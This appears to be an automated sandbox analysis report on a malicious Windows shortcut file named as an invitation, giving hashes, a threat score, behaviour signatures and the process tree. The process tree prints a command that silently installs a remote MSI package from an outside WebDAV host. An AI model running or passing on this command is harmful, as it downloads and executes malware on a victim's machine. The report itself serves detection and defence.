Analysis

  • max time kernel
    118s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    31/08/2023, 02:51

General

  • Target

    AMG_Invitation_Benci2023.lnk

  • Size

    1KB

  • MD5

    6b0a6865586656afd56a14ad525b3c51

  • SHA1

    dc21fd55db7b1d39915a7a27fb7551cadca7be57

  • SHA256

    50fbb29db14c035f8483b67fa97291afcfd4c464b0cbe363b311ff58330c2570

  • SHA512

    c2e5b0fec0e29dade8ddcbe7a0d27af14602010b97230b95c9b7a9eac2413f9af852e76cc11ff0d41a77c18d85e7a4bef51222c9ba1d28a7c4e51f739ef1bcf9

Score
7/10

Malware Config

Signatures

  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\AMG_Invitation_Benci2023.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2596
    • C:\Windows\System32\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i \\view.file-cdn.cloud\DavWWWRoot\1.msi /qn
      2⤵
      • Use of msiexec (install) with remote resource
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      PID:2892
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2800

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads